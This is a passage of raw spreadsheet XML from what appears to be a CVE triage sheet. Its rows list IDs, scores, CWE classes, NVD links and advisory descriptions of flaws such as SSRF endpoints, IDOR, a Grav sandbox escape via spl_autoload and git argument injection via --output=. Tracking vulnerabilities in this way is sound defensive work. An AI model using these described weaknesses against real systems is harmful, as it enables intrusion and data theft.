      <c r="L1310" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a denial of service vulnerability in the publish-service Basic Auth throttle that stores failed-attempt state using attacker-controlled usernames without enforcing capacity limits or eviction policies. Unauthenticated attackers can submit repeated authentication requests with unique invalid usernames to exhaust memory and increase synchronization overhead, degrading service availability.</t>
        </is>
      </c>
      <c r="M1310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85584</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85585</t>
        </is>
      </c>
      <c r="C1311" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1311" s="5" t="inlineStr"/>
      <c r="F1311" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1311" s="5" t="inlineStr"/>
      <c r="H1311" s="5" t="inlineStr"/>
      <c r="I1311" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1311" s="5" t="inlineStr"/>
      <c r="K1311" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1311" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains an unbounded resource consumption vulnerability in the request-concurrency middleware that retains mutex entries for every unique request path without eviction. Unauthenticated attackers can send numerous unique request paths to permanently increase process memory and synchronization overhead, degrading availability.</t>
        </is>
      </c>
      <c r="M1311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85585</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85604</t>
        </is>
      </c>
      <c r="C1312" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1312" s="5" t="inlineStr"/>
      <c r="F1312" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1312" s="5" t="inlineStr"/>
      <c r="H1312" s="5" t="inlineStr"/>
      <c r="I1312" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1312" s="5" t="inlineStr"/>
      <c r="K1312" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1312" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.18 (affected versions &lt;= 2.0.17) contains a remote code execution vulnerability in the Twig sort filter. The sortFunc wrapper in GravExtension.php hardcodes Twig's isSandboxed argument to false, so unlike |map/|filter/|reduce, |sort accepts a plain function name inside the sandbox; the remaining denylist misses spl_autoload, which performs a PHP include. An authenticated user with only page-write rights (admin.pages or api.pages.write) can supply a crafted payload (e.g., via form frontmatter rendered by the Email plugin) that invokes spl_autoload through the sort filter, resulting in arbitrary PHP execution as the web server user.</t>
        </is>
      </c>
      <c r="M1312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85604</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85607</t>
        </is>
      </c>
      <c r="C1313" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1313" s="5" t="inlineStr"/>
      <c r="F1313" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1313" s="5" t="inlineStr"/>
      <c r="H1313" s="5" t="inlineStr"/>
      <c r="I1313" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1313" s="5" t="inlineStr"/>
      <c r="K1313" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1313" s="5" t="inlineStr">
        <is>
          <t>Blinko 1.8.7 contains an authorization bypass (IDOR) vulnerability in multiple tRPC procedures (message.list, message.update, message.delete, message.clearAfter in server/routerTrpc/message.ts and conversation.clearMessages in server/routerTrpc/conversation.ts). Although these procedures require authentication, they query the database by caller-supplied conversation or message ID without verifying that the resource belongs to the requesting account. Any authenticated user can therefore read another user's full AI chat history, modify individual message content, and delete or wipe entire conversations by enumerating sequential integer IDs.</t>
        </is>
      </c>
      <c r="M1313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85607</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85608</t>
        </is>
      </c>
      <c r="C1314" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1314" s="5" t="inlineStr"/>
      <c r="F1314" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1314" s="5" t="inlineStr"/>
      <c r="H1314" s="5" t="inlineStr"/>
      <c r="I1314" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1314" s="5" t="inlineStr"/>
      <c r="K1314" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1314" s="5" t="inlineStr">
        <is>
          <t>Douyin_TikTok_Download_API through 4.1.2 contains a server-side request forgery vulnerability in the /api/download and /api/hybrid/video_data endpoints that allows unauthenticated attackers to fetch arbitrary URLs by supplying a url query parameter. Attackers can request internal services including cloud metadata endpoints and retrieve response bodies containing sensitive credentials through error messages.</t>
        </is>
      </c>
      <c r="M1314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85608</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85610</t>
        </is>
      </c>
      <c r="C1315" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1315" s="5" t="inlineStr"/>
      <c r="F1315" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1315" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1315" s="5" t="inlineStr"/>
      <c r="I1315" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1315" s="5" t="inlineStr"/>
      <c r="K1315" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1315" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 fails to properly validate chart formula expressions, allowing authenticated project members with read access to execute arbitrary code by recovering the native JavaScript Function constructor through mathjs matrix objects. Attackers can use the recovered constructor to load Node.js built-ins and execute operating system commands with the privileges of the API process, bypassing organization authorization boundaries.</t>
        </is>
      </c>
      <c r="M1315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85610</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85612</t>
        </is>
      </c>
      <c r="C1316" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1316" s="5" t="inlineStr"/>
      <c r="F1316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1316" s="5" t="inlineStr"/>
      <c r="H1316" s="5" t="inlineStr"/>
      <c r="I1316" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1316" s="5" t="inlineStr"/>
      <c r="K1316" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1316" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains an unauthenticated server-side request forgery vulnerability in the /misc/favicon and /misc/og endpoints that accept an attacker-supplied url parameter with insufficient validation. Attackers can force the API to fetch arbitrary internal hosts and cloud metadata endpoints, with small responses returned verbatim enabling credential theft and internal service enumeration.</t>
        </is>
      </c>
      <c r="M1316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85612</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85617</t>
        </is>
      </c>
      <c r="C1317" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1317" s="5" t="inlineStr"/>
      <c r="F1317" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1317" s="5" t="inlineStr"/>
      <c r="H1317" s="5" t="inlineStr"/>
      <c r="I1317" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1317" s="5" t="inlineStr"/>
      <c r="K1317" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1317" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.6.3 contain an authorization bypass vulnerability in the bulk delete functionality that allows restricted users to soft-delete users outside their authorized scope. Attackers can include unauthorized user IDs in bulk delete requests to bypass instance-level restrictions and modify or disable accounts they should not access.</t>
        </is>
      </c>
      <c r="M1317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85617</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85623</t>
        </is>
      </c>
      <c r="C1318" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1318" s="5" t="inlineStr"/>
      <c r="F1318" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1318" s="5" t="inlineStr"/>
      <c r="H1318" s="5" t="inlineStr"/>
      <c r="I1318" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1318" s="5" t="inlineStr"/>
      <c r="K1318" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1318" s="5" t="inlineStr">
        <is>
          <t>goose 1.37.0 executes arbitrary commands from recipe stdio extensions and retry.checks without security inspection. Attackers can distribute malicious recipes that execute shell commands as the user running goose, bypassing the recipe security scan which does not inspect extensions or retry configurations.</t>
        </is>
      </c>
      <c r="M1318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85623</t>
        </is>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85626</t>
        </is>
      </c>
      <c r="C1319" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1319" s="5" t="inlineStr"/>
      <c r="F1319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1319" s="5" t="inlineStr"/>
      <c r="H1319" s="5" t="inlineStr"/>
      <c r="I1319" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1319" s="5" t="inlineStr"/>
      <c r="K1319" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1319" s="5" t="inlineStr">
        <is>
          <t>git-mcp-server 2.15.1 contains an argument injection vulnerability in the ref and object parameters of git_log, git_diff, and git_show tools that lack leading-dash validation. Attackers can inject git command-line options like --output= to write files outside the repository to arbitrary paths accessible by the process.</t>
        </is>
      </c>
      <c r="M1319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85626</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85664</t>
        </is>
      </c>
      <c r="C1320" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1320" s="5" t="inlineStr"/>
      <c r="F1320" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1320" s="5" t="inlineStr"/>
      <c r="H1320" s="5" t="inlineStr"/>
      <c r="I1320" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1320" s="5" t="inlineStr"/>
      <c r="K1320" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1320" s="5" t="inlineStr">
        <is>
          <t>Chroma 1.5.9 fails to validate maximum bounds on HNSW index parameters max_neighbors, ef_construction, and ef_search in collection-create requests. Unauthenticated attackers can supply arbitrarily large parameter values to exhaust server memory and cause denial of service during index compaction.</t>
        </is>
      </c>
      <c r="M1320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85664</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85686</t>
        </is>
      </c>
      <c r="C1321" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1321" s="5" t="inlineStr"/>
      <c r="F1321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1321" s="5" t="inlineStr"/>
      <c r="H1321" s="5" t="inlineStr"/>
      <c r="I1321" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1321" s="5" t="inlineStr"/>
      <c r="K1321" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1321" s="5" t="inlineStr">
        <is>
          <t>ms-swift 4.5.2 contains a server-side request forgery vulnerability in the swift deploy OpenAI-compatible API that fetches multimodal media URLs without validation or redirect filtering. Unauthenticated attackers can supply arbitrary image_url, audio_url, or video_url parameters to make the server issue requests to internal services and cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="M1321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85686</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85687</t>
        </is>
      </c>
      <c r="C1322" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1322" s="5" t="inlineStr"/>
      <c r="F1322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1322" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1322" s="5" t="inlineStr"/>
      <c r="I1322" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1322" s="5" t="inlineStr"/>
      <c r="K1322" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1322" s="5" t="inlineStr">
        <is>
          <t>surya 0.22.1 screenshot server contains an unauthenticated arbitrary file read vulnerability in the /info, /page, and /process routes that accept raw file_path parameters. Attackers can read any image or PDF file on the host by supplying arbitrary file paths to Image.open or pypdfium2.PdfDocument, obtaining rendered contents as base64 and using /info as an existence oracle.</t>
        </is>
      </c>
      <c r="M1322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85687</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85691</t>
        </is>
      </c>
      <c r="C1323" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1323" s="5" t="inlineStr"/>
      <c r="F1323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1323" s="5" t="inlineStr"/>
      <c r="H1323" s="5" t="inlineStr"/>
      <c r="I1323" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1323" s="5" t="inlineStr"/>
      <c r="K1323" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1323" s="5" t="inlineStr">
        <is>
          <t>MegaParse 0.0.55 contains an unauthenticated server-side request forgery vulnerability in the POST /v1/url endpoint that fetches caller-supplied URLs server-side. Attackers can supply internal service URLs or metadata endpoints without authentication to read their responses directly from the JSON response.</t>
        </is>
      </c>
      <c r="M1323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85691</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85699</t>
        </is>
      </c>
      <c r="C1324" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1324" s="5" t="inlineStr"/>
      <c r="F1324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1324" s="5" t="inlineStr"/>
      <c r="H1324" s="5" t="inlineStr"/>
      <c r="I1324" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1324" s="5" t="inlineStr"/>
      <c r="K1324" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1324" s="5" t="inlineStr">
        <is>
          <t>jina-ai reader contains a server-side request forgery vulnerability where URL validation is performed only on the initial request but not re-applied to subsequent redirect hops. Attackers can craft a public URL that redirects to internal network addresses or cloud metadata endpoints, allowing the server to fetch and return the target's response body to the attacker.</t>
        </is>
      </c>
      <c r="M1324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85699</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85786</t>
        </is>
      </c>
      <c r="C1325" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1325" s="5" t="inlineStr"/>
      <c r="F1325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1325" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1325" s="5" t="inlineStr"/>
      <c r="I1325" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1325" s="5" t="inlineStr"/>
      <c r="K1325" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1325" s="5" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data in Amazon ion-java before 1.12.1 might allow remote attackers to cause a denial of service via a crafted compressed Ion document that expands to an arbitrarily large size upon decompression due to insufficient coverage of the GZIP auto-decompression opt-out introduced for CVE-2026-75936.
To remediate this issue, users should upgrade to version 1.12.1.</t>
        </is>
      </c>
      <c r="M1325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85786</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86075</t>
        </is>
      </c>
      <c r="C1326" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1326" s="5" t="inlineStr"/>
      <c r="F1326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1326" s="5" t="inlineStr"/>
      <c r="H1326" s="5" t="inlineStr"/>
      <c r="I1326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1326" s="5" t="inlineStr"/>
      <c r="K1326" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1326" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86076</t>
        </is>
      </c>
      <c r="C1327" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1327" s="5" t="inlineStr"/>
      <c r="F1327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1327" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1327" s="5" t="inlineStr"/>
      <c r="I1327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1327" s="5" t="inlineStr"/>
      <c r="K1327" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1327"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M1327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86169</t>
        </is>
      </c>
      <c r="C1328" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1328" s="5" t="inlineStr"/>
      <c r="F1328" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1328" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1328" s="5" t="inlineStr"/>
      <c r="I1328" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1328" s="5" t="inlineStr"/>
      <c r="K1328" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L1328" s="5" t="inlineStr">
        <is>
          <t>Axolotl through 0.18.0 contains a remote code execution vulnerability in the multipack patch path where trust_remote_code defaults to None instead of False, causing the security guard to be bypassed. Attackers can execute arbitrary Python code by crafting a malicious Hugging Face model repository selected as base_model, which is loaded with hardcoded trust_remote_code=True during AutoModelForCausalLM.from_pretrained.</t>
        </is>
      </c>
      <c r="M1328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86169</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86173</t>
        </is>
      </c>
      <c r="C1329" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1329" s="5" t="inlineStr"/>
      <c r="F1329" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1329" s="5" t="inlineStr"/>
      <c r="H1329" s="5" t="inlineStr"/>
      <c r="I1329" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1329" s="5" t="inlineStr"/>
      <c r="K1329" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1329" s="5" t="inlineStr">
        <is>
          <t>MindsDB through 26.1.0 contains a server-side request forgery vulnerability in the web crawler handler that allows unauthenticated attackers to fetch arbitrary URLs by supplying caller-controlled URLs to CrawlerTable.list. Attackers can bypass the allowlist control by exploiting the default empty configuration and access internal services and cloud metadata endpoints without authentication.</t>
        </is>
      </c>
      <c r="M1329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86173</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86177</t>
        </is>
      </c>
      <c r="C1330" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1330" s="5" t="inlineStr"/>
      <c r="F1330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1330" s="5" t="inlineStr"/>
      <c r="H1330" s="5" t="inlineStr"/>
      <c r="I1330" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1330" s="5" t="inlineStr"/>
      <c r="K1330" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1330" s="5" t="inlineStr">
        <is>
          <t>Pterodactyl Panel before 1.14.1 fails to validate action-specific permissions in scheduled task creation, allowing subusers with only schedule.update permission to execute arbitrary console commands. Attackers can create and immediately trigger scheduled tasks that run game-server console commands, control server power state, or create backups without proper authorization checks.</t>
        </is>
      </c>
      <c r="M1330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86177</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86193</t>
        </is>
      </c>
      <c r="C1331" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1331" s="5" t="inlineStr"/>
      <c r="F1331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1331" s="5" t="inlineStr"/>
      <c r="H1331" s="5" t="inlineStr"/>
      <c r="I1331" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1331" s="5" t="inlineStr"/>
      <c r="K1331" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1331" s="5" t="inlineStr">
        <is>
          <t>grav-plugin-api before 1.0.20 fails to validate group-inherited super permissions in user-management guards, allowing non-super user managers to modify super-admin accounts. Attackers with api.access and api.users.write can patch password fields on group-super accounts to gain full administrative control.</t>
        </is>
      </c>
      <c r="M1331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86193</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86195</t>
        </is>
      </c>
      <c r="C1332" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1332" s="5" t="inlineStr"/>
      <c r="F1332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1332" s="5" t="inlineStr"/>
      <c r="H1332" s="5" t="inlineStr"/>
      <c r="I1332" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1332" s="5" t="inlineStr"/>
      <c r="K1332" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1332" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="M1332" s="6" t="inlineStr">
        <is>
